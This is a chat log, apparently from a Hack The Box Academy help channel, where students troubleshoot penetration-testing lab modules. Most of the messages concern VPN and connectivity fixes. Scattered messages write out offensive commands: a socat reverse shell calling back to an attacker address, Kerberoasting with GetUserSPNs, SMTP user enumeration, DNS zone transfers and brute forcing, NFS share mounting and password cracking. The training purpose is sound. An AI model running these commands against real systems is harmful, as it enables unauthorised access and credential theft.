#modules
hi. i think there's an issue with one of the modules. the shell and payloads one. the skill assessment seems to have at least two issues: 1) most of the time you can't spawn the target. you click and wait half an hour and still no target. 2) if you're lucky after several tries, host2 and host3 don't seem to work properly. each time you try to access blog.inlanefreight.local or upload a file on host3 you get a connection reset or timeout
issues happen whether through Firefox, Burp Suite browser or cURL
so it seems there's something wrong with the hosts
Are you using EU vpn?
Might be stupid but maybe try running ftp.app? for some reason it shows on your machine as ftp.app instead of ftp there
nope not working
/usr/lib/apt/methods/ftp
i found the file path of it
its definitely there but the terminal just cant find it
thats weird
it should be in /usr/bin if its a binary
If you run sudo apt install ftp does it tell you that its already installed?
ok just checked through the search and it seems that A LOT of people are having those timeout issues. is that module still working actually?
maybe try a PATH abuse ;))
i did it just doesnt work
/usr/lib/apt/methods/ftp -p 10.129.158.192
100 Capabilities
Send-URI-Encoded: true
Send-Config: true
Version: 1.0
it just pastes this instead of actually connecting
i just use the path instead of ftp since it cant find it but the ftp itself as well doesnt work
im gonna start tweakin
i know why
im not connected to a vpn i just realised
switching to EU 2 to have a look
do i use udp or tcp
ftp -p 10.129.210.92
100 Capabilities
Send-URI-Encoded: true
Send-Config: true
Version: 1.0
just gives me this when i use ftp command
works
target spawned quickly. then pwned host2 in two minutes. so the last 5/6 hours spent were a network issue lol
the targets are still massively slow. but at least the exploits work and i can upload files
and finish the module zzz
good to know for the future
together with the ftp package you may need to install vsftpd and start/enable the service, then try to run again the ftp command.
/usr/lib/apt/methods/ftp -p 10.129.210.92
100 Capabilities
Send-URI-Encoded: true
Send-Config: true
Version: 1.0
just doesnt work just gives me this response all the time
also i installed vsftpd
how do i enable the service and check its enabled
can you just try to run ftp <ip>?
ye same response
strange, for me it works. Plus you need to get used to linux, better to start from the linux fundamentals module or you read the man pages.
EDIT: There is always google by the way in case you need it
If you have tried everything and it still doesn't work, try taking a break
module done. so, good to know. if someone gets some weird stuff not working in the future, seems that changing VPN may help. thanks
Try with the workstation provided in academy instead
How did you install the OS and how did you install ftp?
Trying to use the PUT method to change the data from london to flag, what did I do wrong? ||curl -X PUT http://83.136.251.211:55760/api.php/city/london -d '{"city_name":"flag", "country_name":"osaekhada"}' -H 'Content-Type: application/json'||
It was directed to the guy who has problems with ftp, I'm curious if he installed it via live cd or a preinstalled vm
Hi, I'm currently on "Attacking Email Service" in the "Attacking Common Services" and the command: ||smtp-user-enum -M VRFY -U users.list -D inlanefreight.htb -t 10.129.203.12 || doesn't seem to be finding anything. It attempts to find any users, however comes back with zero. I deleted and redownloaded both users.list and smtp-user-enum. Restarted VM, tried new IP and nothing. Does anyone have any idea? I can send screenshots if needed, all it says is 0 results. I have tried to find the actual user in the user list to which they ARE in it, but I just want to actually do the lab.
ah
Are you completely sure VRFY is working fine? Double check and then see if you can use something else
I tried all 3 of them
dm you
kk
Look over the responses carefully. Don't rely on the response colors.
Wdym? It's all the same color lmao, I am just getting 0 results from the smtp command
Sorry. I just redid the footprinting module and ran into an issue, but you are on a different module. Ignore me.
all good
Got it to work; was the vpn I was using. Worked fine yesterday then broke today.
Nevermind im stupid i didnt escape it
just got the htb student monthly
Hello edgy dark humor skid
Read and follow #welcome and do active content on the main site
can anyone lend a helpful tip on this module, find through SPL searches against all data the password utilized during the PsExec activity. I feel that the first command in the module leads closer to finding the answer. although I feel like I'm missing one or two more steps to finding it
I feel that the other commands in the module are over complicating it
there's definitely a mistake on this module
https://academy.hackthebox.com/module/54/section/511
question asks for the full URL of the page that says 'You don't have access!' .. im on the webpage looking at the message, i copy that same URL into the answer field and says its incorrect...
nvm
it doesnt like that i specified the port instead replaced that with the word "port"
yep
that's exactly it
since it's a docker instance, the port isn't gonna be consistent
hello everyone
I'm doing the Windows Event Logs module. However, the RDP connection is not stable.
anyone can help me with this ?
i followed everything to the Tee but i can't get SedownloadPrivileges to work and be turned on
even the automation script doesnt work
same was happening with me try different EU VPNs
I am trying to setup ligolo and it says the interface is down?
Here are the commands I ran:
```
sudo ip link set ligolo up
ligolo-proxy -selfcert
```
9: ligolo: <NO-CARRIER,POINTOPOINT,MULTICAST,NOARP,UP> mtu 1500 qdisc fq_codel state DOWN group default qlen 500
link/none
Is there any other commands I am supposed to run?
In password attacks, PtT Linux, i am stuck when escalating to julio
can someone nudge me?
I tried with a different VPN. Same problem. I tried directly on the pwnbox, it is not stable. I just waste my time!
the interface is up
run ligolo and it should work
omg yes its not just me
in another module i couldnt access ssh but i could with pwnbox
hopefully they fix this soon
but when I did some exercises with elasticsearch it was not stable too
ho ok so the problem is known
it is very frustrating
i dont know if its known
[macOS fundamentals] - Where are the Applications related to the system stored at?
i tried /Applications, Applications
and /app /app/data
it's looking for system apps, not normal user apps
should be /Applications path since system installed .app files live there
Is it just me or are the target hosts in academy super unstable currently
They seem to stop responding intermittently
I don't have a Mac so I'm having trouble answering the question
Idk I
Here you go https://infinitemac.org/2001/Mac OS 9.2.2
A classic Mac loaded with everything you'd want.
i wonder if that actually works lol. it might be a bit old.
it wouldn't be real red teaming without a little torture
hi guys, how can I find out which domain and smb server belongs to?
include the module and section when you ask here pls
and again one of the tools in the section will do it
oh sorry let me do that
module is "footprinting" and the section is "smb"
is it smbstatus?
Have you scanned the target?
yea
How have you enumerated the target?
I am working on the session hijacking section of the XSS module. I am trying to set up my listener on a separate laptop. I have the htb vpn running on it. I used the command "ip a" to get my machines ip for the script, but eth0 shows that it is down. the ip addresses at lo and wlan0 did not work.
any tips on how to troubleshoot this?
yea
your eth0 is your wired nic, try the tun0 adapter which should be your vpn connection
@pine dune **How have**
oh sorry tired 😅 I did smb//<ip>
tun0 is not populating when I use ip a. i thought the one I needed was missing. Maybe i need to rerun the vpn
yeah if ip a didn't show tun0 (on kali) then it's not up. i think on parrotbox it's like ens1234 or whatever the numbers are
try re-downloading the vpn file from academy and reconnecting openvpn vpnfile.vpn & then you can close the window when it connects
@rustic sage
I mean there are tools taught in the section, use them
smbclient is not the only tool
thx bro 🥰
@pine dune Go back over the module and look at the enumeration examples i.e. commands
thx 💖
okay thanks @next bronze and @rustic sage
NOT WORK haha
Did /System/Applications work
is the answer not in here? I am sure its in this image
does any of those say domain?
I think you should review the module and look at the commands
look at the commands in the section lol
Your answer is in the commands within the section
ahh my bad I thought it was asking server not domain 😅
The issue is, you're not testing and enumerating enough
yeah
We have twice
and i found this
It's in the module notes Alpha, re-read it carefully
okay thanks
Is kali or parrot os better
as u like
whatever your preference is (kali is better)
haha 😅
the truth is they're both debian based and you can install whatever tool the other one doesn't have pretty easily, it's literally preference
He is a fan of Kali Linux 🤸
thanks @rustic sage and @next bronze found it 😄
neither is necessarily better but kali comes with zsh installed
speaking of which, installing Parrot OS 6 HTB Edition has an issue with bash; every time you open it, it spits out garbage characters
real hackers use sh 
You're not good at using it, admit it
what
Just kidding, you're right about that, but it's fast
Have you enumerated the shares you have access to with commands from the section?
I think so
i was able to figure out the vpn issue, but i still cant get a response on my listener. I am going to set it aside for now and try again later
@pine dune Look at the commands outlined in the section for rpcclient
There is a table that shows you one in particular you need here
okay thanks Ill check it when I come back from outside, I have to go outside for abit
hey guys
Still I am getting this error so many times
re-download the vpn (choose TCP), reconnect to the vpn with the new file, restart the victim machine, wait 5 mins, then try again
okay
and maybe switch VPN regions, i'm always hearing about how EU vpn has issues if you're on that
guys pls help here
from yesterday I am unable to move this file
maybe try copy instead, there are also a ton of other ways to xfer files
how to copy
the command is 'copy'
ok
An apt upgrade should fix it
yup. upgraded and reinstalled bash, no more garbage
just a bit annoying to figure out for the first time
I tried all possible methods but it didn't work
Perhaps you're not going back far enough
Are you asking me or telling me that's what you tried
ok
. this too
has anyone else here done the vulnerability assessment module? I'm most of the way through it right now and I've been working on it for 11 days. I'm at the first nessus assessment and I will probably finish on Saturday because tomorrow and today I am booked.
I ought to reread the nessus stuff tho
everything you need is on the provided host [target] at https://ip:nessus_port/
and the creds are given to you to log into it
unless you have a pivot, you're not scanning the internal network
just gotta find time to finish it
ok cool got it thanks. good to know
is OpenVAS assessment similar?
is it normal to take two weeks to complete something like this?
with 17 sections?
yes
they both have pre-compiled scans that will have all the information required to answer the questions
I did the math and the average module has 17 sections
so, if I complete 17 sections every two weeks I will complete the CPTS path in 11 months
is that normal?
there's no "normal"
if that's a pace you're comfortable with. then it's fine
if not then re-evaluate
ok got it thanks
it's as simple as that ¯_(ツ)_/¯
Learning is a skill in and of itself, some are better at it than others as it's more practised
Rushing decreases retention rates, too slow wastes time
Just make sure to revisit things from time to time and you'll be fine
and to a degree "too slow" depends on the person
Yes
some people may only have time to set aside N hours of progress every day/week
it's just coming to terms with understanding that it will take longer overall
nobody here that did the SAML part on academy?
Why do we use the word FUZZ after the end of files? Is it useful?
in what context
ffuf -u http://94.237.54.214:33139/FUZZ.php -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-small.txt:FUZZ
list:FUZZ <-
according to the documentation that shouldn't be required. i'm not sure why it's added.
so that it's easier to set up multiple fuzzers: FUZZ FUZZ1 etc
convention generally
it's to show that technically you can replace :FUZZ with anything like :SCAN
okay
(and replacing the FUZZ in the url with SCAN will perform the same task)
with multiple wordlists, it makes it easier to parse through
Thank you for a nice answer ❤️
In this
sam.save and security.save file moved and copied successfully but
system.save file getting network error again and again
Its because system.save file is much larger than other in size
So anyone knows how to transfer big files
any alternative method???
how
naw that's a pic of the module
but ik what you mean, sharing the folder you save these to
how are you connected to the windows box
smb is usually pretty stable, are you using tcp vpn
through rdp
or is your smbserver cooked
what rdp client
yes
xfreerdp
add the flag /drive:/secret/weeb/folder
then when you open Explorer you'll see the drive connected under 'my computer'
probably the easiest way to xfer files
okay let me do
0%
since 5 mins
Is there anything I am mistaken
i'd probably reboot the victim host at this point, maybe your vm box/computer too and try again
^
Internet is very good
are you on wlan?
When I delete any file
It takes 0.4 to 1 seconds
But when I start copying it takes so long
Yes
wired will be more stable
wlan shouldn't make a difference
i've done a handful of content on WLAN just fine ¯_(ツ)_/¯
yeah it shouldn't but at this point it's either he needs to reboot the box/his stuff, or there is some kind of network problem going on
just curious if he considers "very good" internet over wifi
Yeah may be
because i don't
It's true
Internet is good
¯_(ツ)_/¯
i mean definitions can vary yeah
the other telltale sign is if you ping the box and get random spikes out of the norm
i.e. norm being 200 and you're getting like 16k ping spikes

You can try the pwnbox like Xre0us suggested, otherwise reboot the victim vm, reboot your computer, start it all up and try again (give the victim ~5 mins to spawn)
also download a new vpn, change regions to generate a new one
Sure
I am going on pwnbox
make sure to disconnect from the vpn if using the pwnbox
^
Okay
Hello 👋
It's about 1 hour 25 minutes
(yes vpn region still affects even with pwnbox)
EU academy 1
maybe consider swapping to US or somewhere else for testing
US academy 3 has never let me down
really shouldn't be that slow
Then let me try this also
How boring is going on
Is this the fastest way to transfer file?
Smb is just the simplest
for the purposes of the lab i would say transfer methods are negligible in terms of speed
Which pwnbox location would be better?
i would try US
Ok
if another region and/or the pwnbox doesn't work, you should probably open a ticket with support via the website
successfully transferred through pwnbox
But I wanna know why my VM was too slow
did you change regions on top of using pwnbox
^
yes
it could be either the region or your box then
Vpn connection was the problem
yeah probably
More dedicated ram
i've seen virtual machines fail, kinda rare, but it's happened to me where stuff was just a little off and not working. a reboot of my main computer fixed it. you could always try rebooting and trying again if you really want to figure it out
it's a networking problem if file transfers are slow
But in seriousness it depends
I have provided 6.5 Gb RAM
How much does host have
1
?
well that's a problem
16
Ok that makes more sense
it's probably more something is going on with winsock or the vm's network stack
Also sometimes having too many cores allocated can cause issues
Parrot doesn't like more than like 4 I think
I run my parrot vm with 4GB ram and 2 cores
Though with my frankentop I'm surprised it just works
2c/4gb or 4c/8gb will be enough
it's very likely not a resource issue with the vm
Yeah doesn't look to be the case
No one's really going to be able to directly pinpoint exactly what caused this, but again, reboot your entire box and try again and you may find it just works again. also keep in mind, you changed VPN regions, so it could still simply be that the region was the issue.
I have faced so many problems
but pwnbox has solved it because of its better performance
nothing wrong with using the pwnbox
Yep
Okay I understood
but there are so many tools given in modules which are needed in real world
thats why I am using VM
reboot your pc, connect to us vpn, see if it works then
that's my advice if you want to continue troubleshooting
yes it does
does this work
Does anyone have problems starting the machines?
[NTLM RELAY ATTACKS - SKILLS ASSESSMENT]
Hey guys!
Currently working on skill assessment here and got stuck on second question.
Can I have a nudge?
I like the siem fundamentals course I finally understood how each component of ELK stack works as my only exposure was to splunk which already has everything integrated
Hi all, i'm working through "Introduction to Windows Evasion Techniques: Dynamic Analysis" and i'm using Micr0_Shell to generate the shell code but it's not giving me a shell back. I moved on to the Process Injection, and Notepad opens but again i don't get a shell back. I'm literally following everything step by step. Can someone check i'm not going insane and check if they get a shell back using Micr0_Shell
UPDATE: I tried again following the same steps the day after and it works
I need help with the Zap Fuzzer section. I don't know if Zap Fuzzer is already installed on my machine or if I would need to download Zap Fuzzer.
hey i need quick help, how do i remove this notification bar on top of my screen
Exams VPN Scheduled Maintenance us-academy-exams-1 this one
that's the neat part, you don't. you can probably do it through some browser editor or something
damn, when i fullscreen my inbuild terminal, i cannot remove it lol because the buttons disappear
yeah i use my own vm so i don't worry about that
nevermind
can anyone explain / give hint on this question
Footprinting module SMB section
I have tried using rpcclient netsharegetinfo, but didnt get the solution
Banners
Hint: customized means not a default name like smbd or smbshare
But perhaps tied to a company name
got it, that was easy😂
Overlooked it?
yes
Hi, i'm stuck on https://academy.hackthebox.om/module/80/section/848
Broken Authentication:Skill Assessment - Broken Authentication
After some detect length of password i found 2 passwords:
**
**
And use ||http://.../messages.php -X POST --data user=FUZZ&message=random&submit=submit||
found valid users:
||guest
support.it
support.uk
support.cn
support.gr
admin.cn
admin.us
admin.gr
admin.it||
obtained valid credential ||support.uk:*||
Nothing found in here
Understand logic of cookie:
but this didn't help too
hard to not spoiler anything, I'll dm you.
||Are you sure about the cookie?||
Depends on the logic. But you’re getting there
Yeah, I'm already closer but not enough.
Feel free to dm me if you need a nudge. Tell me what you know and I’ll see what I can do 🙂
||showmount -e 10.129.202.41 Export list for 10.129.202.41: /TechSupport (everyone)||
||sudo mount -t nfs -o rw,nolock 10.129.202.41:/TechSupport /mnt/techsupport||
||ls -la /mnt/techsupport ls: cannot open directory '/mnt/techsupport': Permission denied||
I tried my best with searching up this problem, idk why it won't let me read or access the share
I found something new for myself. So maybe I will try more.
you need to use an option that doesn't lock it
or; just run around it as root
i think it's like norootsquash
thats what "-o rw,nolock" does no?
I see, so i should add that option in like "-o rw,nolock,norootsquash"
oh nvm
not even chatgpt4o could help me out here
just su to root or use sudo to grep/find
alright, will update
Hello I’m doing Linux fundamentals in htb academy and I’m ssh in to a mec I’ve got all but 2 flags I need the What is the path to the htb-student’s Mail?
Which shell is specified for the htb-student user. Can anyone help talk me through it please give me an idea where to look I’m a complete noob the rest I’ve found myself just them 2 are hard to come by
env
then you can search that list for MAIL and SHELL
note the MAIL directory may not actually exist on the filesystem
hi guys, can someone help me ?
which is the right channel to ask about a hint for a machine?
you mean on https://app.hackthebox.com/ ?
Thanks I’ll have a look at that now
yep
What version of the SMB server is running on the target system? Submit the entire banner as the answer.
Is there an error in this question?
submit the ENTIRE banner
i solved it thank you
shiii, so I tried running grep on it, is there a way to make it just list out EVERYTHING in the mount? I did get some output but I am sure there is some way to just get an output of the contents of all the files in the mount share
Guys i'm stuck on HTB corporate machine, i have owned the workstation (10.9.0.4) but i'm stuck, i don't see any way to jump to other machines...
to speed things up; only one of those tickets has text
some tips please?
wrong channel still
thx done
GL :)
Module: Attacking Enterprise Networks Section: Exploitation & Privilege Escalation
For anyone needing this, changing the VPN server was the fix for me!
Phishing section of XSS module:
The URL I made works fine when I test it on my end but when I go to the send.php page it's unable to send the URL. Anyone run into similar issues or may have an idea of what I may be overlooking ?
most people prefer to do the AEN blind
It makes sense, I just replied for a possible solution if anyone faced the same problem as me because I couldn't find a similar issue here
because most people are discouraged from asking for help on that module, as the module itself is the walkthrough
so if you're struggling, with the steps in front of you, it's generally not a good sign
Yes I can understand why, my problem was a weird one, me and the support were trying to look at the problem but a simple change of the vpn server was the fix
tends to be the simplest solutions to problems
:) and usually the first suggestion to try if you're sure you're doing it right
Hey, @west rampart does the Plan Feature - Monthly billing for Students, unlock the completed modules permanently once they are solved?
how can i have access to chat in global ?
Thanks
read and follow #welcome
Hi, not sure if this is the right forum to ask this but does anyone know if there are any channels for the Blacksky cloud labs? Thanks in advance.
as Blacksky labs are enterprise only - no
will keep that in mind
Any hints on Attacking common services - Easy? Already done tons of enumeration, read documentation of XA* running on the server, tried what stated on FAQs, bruteforced ftp, smtp, rdp..., tried also with user f* I got enumerating... I think I may be getting crazy, supposed to be Easy hahahahahah
also, no anonymous accesses are allowed
You're likely just overthinking it
probably
There's a running service and placing files is easy
you mean on the service?
i understand what you mean, but I have anonymous access to none, am I trippin?
I am trying to start the fuzzer for the Zap Fuzzer but don't know how to set the payload
" The directory we found above sets the cookie to the md5 hash of the username, as we can see the md5 cookie in the request for the (guest) user. Visit '/skills/' to get a request with a cookie, then try to use ZAP Fuzzer to fuzz the cookie for different md5 hashed usernames to get the flag. Use the "top-usernames-shortlist.txt" wordlist from Seclists. "
Hey, Im doing footprinting module and stuck on a question in the smb part
"Find additional information about the specific share we found previously and submit the customized version of that specific share as the answer. "
I know the share is called "sambashare" in the smb server but how do I go about answering this question?
You have creds, no?
If not then you haven't dug hard enough
I assumed I was missing something
the module itself provides both users and passwords, so will try that again
thx
look for something that looks like a 'version', you probably have it in front of you
thanks...ill try
find through an analytics-driven SPL search against all data the source process images that are creating an unusually high number of threads in other processes. Enter the outlier process name as your answer where the number of injected threads is greater than two standard deviations above the average. Answer format: _.exe (any tips anyone can give out?)
don't get crazy, it is a version as if i write "My Apache 2.2.2"
The password was not in the list provided. After 30 minutes of bruteforcing everything I asked myself 'should I try rockyou?'. Got it 5 seconds later🥵
im running a search exploit on an ip using msfconsole
but it just comes up with like 2000 exploits how am i meant to find a plugin one like im so confused
y
to discover the plugin, maybe look at the webpage
sometimes they're Simple
So basically a made up version by the user?
no?
im pretty sure u can find out via rpcclient command
Made up is also pretty loose
Ah Im a bit confused on this
if you customize a version, i.e. write in certain lines of code and deviate from the source code for updates
it is no longer the base version
Really? Ill check that once I get back home...currently on the bus rn for a talk
A lot of browsers are based off of chromium now
does that mean that Firefox is just a made up version of Chromium?
or Edge?
How exactly am I meant to find it, I mean what should I look out for in the smb server
i mean one of the enumerations in rpcclient says it to you
perhaps look for its relation to a company
yeah man look at the rpcclient commands
Hmm okk
companysmb numbers
iirc is the format
you likely looked at it and disregarded it
when u go in rpcclient u can type help to view available commands
see which command could enum for smb
the commands needed are also shown in the section
no need to view the whole gamut of commands
LOL well the more you know
the easier modules tend to not just dump a tool on you and not at least give you some basic commands
Okay thanks guys ill try enumeration on rpc when i get back home tonight
👌
it's also in the banner when you connect to the smb server
oh i didnt know well that way is easier ig
simple and easy to overlook
most services tell you what version they are when you connect to them ¯_(ツ)_/¯
yeah i just go straight into looking rather than seeing the banner when u connect lol
could anyone lend some guidance towards this question "find through an analytics-driven SPL search against all data the source process images that are creating an unusually high number of threads in other processes. Enter the outlier process name as your answer where the number of injected threads is greater than two standard deviations above the average."
Remove blue payload.
on attacking common services medium is the machine going crazy or am I not supposed to log in through ssh? found valid credentials for user s* bruteforcing ssh itself xD, but cannot connect through console
nevermind 🙃 easy is clearly swapped with medium
tips on enumerating pop3 and imap services without any prior credentials?
currently running nmap brute-force scripts for hopefully more info
Got any more context? Like which module and section you're working on?
footprinting lab hard
AYO PAUSE
apologies
nvm I think i figured out what i need to do
Not the server for piracy. Also this channel is only for HTB Academy
hint being the "backup server"
bingo
Hi all, I'm working through "SQL Injection Fundamentals" and I'm noticing that the scenario described in the text isn't lining up with what I'm seeing when I connect to the server spawned at the end. Is that normal?
which part of sqli module u doing
specifically on the UNION clause part
Can anyone else confirm that sysmon.exe is broken on the "Analyzing Evil With Sysmon & Event Logs" section of the "WINDOWS EVENT LOGS & FINDING EVIL" mini module? (https://academy.hackthebox.com/module/216/section/2301)
Spawning the Windows target host, RDP'ing and then running sysmon.exe results in failure.
This is done having CMD being run as an administrator. No modifications were done to the XML file that comes with the VM.
can you describe more about your issue?
Yes, for example, within the text it says the following:
so entries from the ports table and the ships table were combined into a single output with four rows. As we can see, some of the rows belong to the ports table while others belong to the ships table.
😔 sorry, been a difficult week.
I don't see a database or tables that match up with what's being described here. Is that normal?
Like, the author is describing this from a 'hypothetical' example?
well what have u tried on the target to re-create that sqli?
I'm just learning the union clause, I have a server to connect to and try it out
everything is an example
is it a practical example?
yup
should those tables be visible in the database that I connect to?
i dont think those specific tables, if u connected to a mssql or doing it via a sqli exploit it wont have the same database and tables etc etc, its the method of how to use un-even columns with union clause
Got it. so it's more of a high level explanation. 👍 👍 Perfect! thank you!
yeah its just the method you have to understand
'method' was the word I was looking for. Thank you.
@jolly cradle apparently @ everyone perms might be busted
oh its not allowed?
then why it said i can ping it
it got deleted automatically i asked for help network
It doesnt actually ping it
Weird, I was receiving pings
maybe its just a glitch lets move on
anyways can i get network to install viruses to understand the viruses and get rid of it challenge
You asked for viruses
Specifically
yes but i want network on
The answer will be no
okay
This channel is for discussion and help with the htb academy modules
im so sorry sir ill read rules right now
I am having a problem cracking the password for the linux pass the hash for the linux01$ account I have root and the password hashes but after trying several dictionaries I can not get the password, can someone tell me if I am going in the right direction or help nudge me to where I need to be looking?
Why would you even ping everyone?
it looks aesthetically even if it's not working

Hey, so in this example they talk about how sometimes powershell is blocked, and the alternative may be to use a LOLBIN like for example the Intel Graphics Driver but they use it in the example... from PowerShell, so what do you actually do if powershell is blocked
Cmd?
Hello I have a question about the module Windows Event Logs
they did a sneaky with the ghost ping
I did the exercises but I have a question with the second
That's probably possible, although what would you do in case CMD is also not whitelisted
I was not able to filter correctly the log to isolate the good event
I tried to use this following XML but it seems the query is ignored
which module?
they meant powershell scripts i believe even then if powershell itself is blocked then u can use cmd
well you do have to change some modifications to the query info
like ID and such
It is my full XML so I'm already filtering the good event ID (it works).
skill issue
well you also need to filter by userID
at least for the one section that has you start at logon events
also only one of those will show the right info
as 4907 is only one type of logged event
sorry LogonID*
could give me an example?
there's an example from the module, no?
Idk depends on what i have. Maybe another user has the priv to run em. Idk task scheduler or vsb, pretty sure metasploit would work too etc
i mean
it's partial, yes
but that should be enough to build off of
SubjectLogonID is part of the Name Data field of the XML field of the event
looks like the ProcessName field would be what you use
or maybe ObjectName
since it gives you a path?
hello guys Are your VPN files working? Even though I tell the VPN files one by one, they are not connecting.
yes
it works for me only RDP connection are not very stable
anyway thanks for your help. I will continue the exercise and maybe with other example and the practise I will understand how to use the XML filtering correctly
if you look at the link i sent regarding EID 4907; it shows the different fields in the DATA portions of the xml generated by the event
<Data Name='<name>'>(Actual Info)</Data>
for instance in the example the 0x3E7 is represented by <Data Name='SubjectLogonID'>0x3E7</Data>
you should be able to work backwards from there
Anyone else having issues connecting to targets? Specifically RDP sessions? Tried on PwnBox as well as my own. Tried renewing VPN connections and respawning target hosts...screen just sits on black til it eventually times out
press <enter>
Blackscreen +infinity | braincells 0
lol well i just needed your response Marcie....didn't even have to hit enter this last time i reloaded it
will do that next time though
hahaha.....been trying to search the discord chat on questions prior to posting them but failed on that this time too
in:modules blank screen or in:modules black screen
yeah i just mean i failed to search before asking the question lol
np
the one thing i dislike about discord search is that it's not overall keyword search
it's verbatim search
so it'll look for "blank screen" but not "screen blank"
yeah not the best, could be worse....I've generally found enough past content not to bug you too much!
this channel is meant for asking questions ¯_(ツ)_/¯
sometimes all I do is a quick google query to answer stuff
i.e. finding the microsoft article about event ID 4907 and quickly scanning it to understand what data it's pulling for finding info
is it possible to decrypt a file without knowing the key?
You mean access a password protected file? Or you mean after a ransomware attack
Either way, not for this channel
Read and follow #welcome to access more of the server
ok which channel?
Well if you read and follow #welcome you can probably figure out for yourself which channel would be better for your question
Even #1024429874246590575 might be more appropriate
Maybe #forensics-cryptography
where i can find my (ACCOUNT_IDENTIFIER)😅
Man if only they told you exactly where in the instructions
Specifically in step 1
ok i didnt read the steps thanks bro😂
anyone else having issues reaching the web-pages on port 80 for the "documenting and reporting" labs ?
i can ping them and nmap shows them but a web browser or curl times out
this is cool https://discordapp.com/channels/473760315293696010/1232354387288920064/1241058362578436096 , but 500 cubes for mini module
The Password Attacks module has a couple of sections on cracking files. Hopefully his question was not related to that.
It's not
hi I am having trouble selecting a msfvenom payload is there a site like revshells that will do this hard work for me or a site with a guide for it?
anyone do this room
i can't connect no matter what i do
refresh VPN start a new connection nothing works
are u using xfreerdp to rdp into the target?
is xfreerdp actin up?
idk i was just asking if he was using it to rdp and if thats giving an issue then to use remmina tool and see if its also giving issues
im asking because right now all the linux rdp tools are being weird
they kick me out or they say invalid password when that password just worked
I am a part of domain admins but I cannot view reg key
I tried to use elevated powershell but there was no prompt and no difference in whoami. I am currently netadm which is part of Domain Admins
have u tried to log out and log back in sometimes that will kick the perms to start in a new session
yea I tried closing the rdp session and logging back in
have u tried to query in cmd?
which module u doing i assume the windows priv esc dns admin
yep
I tried going into admins folder to view the flag but I got the same permission denied
maybe uac is on, try to see if u can open a cmd not in powershell and right click on cmd and see if u can run as administrator
wait wait lol is the ip the same ip for your machine inside of your query? i just noticed that.
yup
we need to provide the foothold ip right?
yup just wanted to see if u did that correct but u did. idk why its giving u access denied
yes I guess now I will try resetting the target
yeah man sorry wish i know why
no issue bro thanks for trying
if I remove the ip it works maybe because its local
and when restarting dns it runs without the cleanup step required
logging out from the account using start did the trick
Hi, how can I get the fqdn of an ip address?
u can use dig
dig followed by ip address?
dig any ip address
ok thanks
it should have been explained on the dns module u doing rn
I think it did somewhere but theres too much info 😅
yeah thats how its gonna be thats why u take notes and review back on the section to see where u can possibly find the answer even if that means re-reading the whole section again
okay thanks
yeah man but if u need any more help always got u
thanks bro
Rdesktop
try using a diff tool instead
Hi, I used this command to try and find the TXT record in zone transfer
i saw there was a root.inlanefreight.htb sub domain
what can I do with this to access the TXT record 😅
maybe u can zone transfer with root.inlanefreight.htb
I tried that
to this day i still dont really understand zone transfers and how to do them good
That's not a subdomain
oh what is it?
That's admin email
ohh
ahh
Look up soa records
that root.inlanefreight.htb is part of the SOA record
^
this is a bit complicated 😅 tbf
how can I access the TXT record pls
Look at all the subdomains in the axfr
ok hold on
if its in a A record its a sub domain right
Sometimes
I'm just using subdomain loosely here
what is A record?
ahh i saw it
returns an IPv4 address of the requested domain as a result.
@fathom pendant can I post an image?
just wanted to clear this up since we on the topic of dns zone transfer. if u see the subdomains once u zone transfered like how he is doing dig axfr inlanefreight.htb @10.129.176.215 and u want to zone transfer like internal.inlanefreigth.htb u need to add it to the /etc/hosts?
I added it to etc hosts
You don't need to add anything to /etc/hosts for this
yeah lol just no spoilers thats it
Don't forget proper spelling
i dont think its a spoiler but okay ill go ahead
there are 3 TXT under SOA
Handful of subdomains to dig through
okay so same command but replace the dns name with the subdomain?
dig axfr subdomain @target_ip
ok thx ill try that
Domain name* not dns name
my bad
im just reviewing everything before i take the aen blindly lol
An fqdn is comprised of multiple parts. Sub.domain.tld
(Tld is like .com, .net, .htb)
sub can also be www just in case
yeah thats what i was talking about
how do i fix it?
that was my problem and hated it
yeah but that was a longgg time ago thats why i was asking again to see what i did to fix it
adding it to /etc/hosts wont fix it so that wont work
ahh
i think u need to use the ns record
yea? the one above
replace the @ip with the @ns.inlanefreight.htb
so instead of ip addess I have the domain name and the @ns.inlane...?
yeah see if that works for zone transfer
🙌
@pine dune im so dumb
ok so basically u cant always zone transfer
like the dev.inlanefreight.htb u cant zone transfer
and the @ns.inlanefreight.htb no need to do that just keep the target ip
plus u would need to add the ns.inlanefreight.htb to /etc/hosts so no point
i did that initially but it didnt work 😅
ik but im saying keep it with the target ip
and zone transfer a diff sub domain u found
like internal.inlanefreight.htb
so dig axfr internal.inlanefreight.htb @ip
yeah im saying that it wont let u zone transfer at all
for that specific sub domain ? ^
yup
so try a diff one and see if it will let u
ok cool
thanks a lot bro...it worked
yupp anytime
What is the FQDN of the host where the last octet ends with "x.x.x.203"?
last question...ive tried enumerating all the subdomains from the command u told me @wanton idol but none of them seem to work
I'm having issues with socat instantly dropping the reverse shell connection. It will call back to the listener and then drop. I'm using socat TCP-L:<PORT> FILE:`tty`,raw,echo=0 as the listener and socat TCP:<ATTACK-IP>:<PORT> EXEC:“bash -li”,pty,stderr,sigint,sane. I'm not using setsid because it breaks my command. I used the -h and checked others' commands. However, they all seem a little different where they place "bash" and "EXEC" does that matter?
this one u would have to brute force it
i suggest with dnsenum
can u give me some guidance?
dnsenum --dnsserver 10.129.14.128 --enum -p 0 -s 0 -o subdomains.txt -f /opt/useful/SecLists/Discovery/DNS/subdomains-top1million-110000.txt inlanefreight.htb
thanks
yupp and for the inlanefreight.htb make sure u change it to like all of the sub domains u have found and try it on dev.inlanefreight.htb since itll brute force it will find some stuff for us
okay thanks...rn im tryna locate my seclists lol
this is what i got 😅
@wanton idol
^
oh shit my bad
lol
can anyone here confirm that the target are spawning normally ?
targets been spawning normally for me
been spawning normally for me..but I was having vpn issue before
try switching to a diff vpn
the VPN is fine , seems like frontend error
So I'm on 'Kerberoasting - from Linux' in the 'Active Directory Enumeration & Attacks' module...continuing to get "[Errno 104] Connection reset by peer"
GetUserSPNs.py -dc-ip 172.16.5.5 INLANEFREIGHT.LOCAL/forend -request
Having no issues Listing SPN Accounts, but adding in the -request above doesn't render one TGS Ticket due to the connection reset by peer error. Any suggestions, as that is the exact command listed in the solution? I've reset the Target server once already
Impacket-GetUserSPNs -dc-ip 172.16.5.5 INLANEFREIGHT.LOCAL/forend -request
is the command being run
try with -request-user user
have u tried python3 then the rest of the command?
D:
try sudo ntpdate -u 172.16.5.5
everything im telling u is from the module
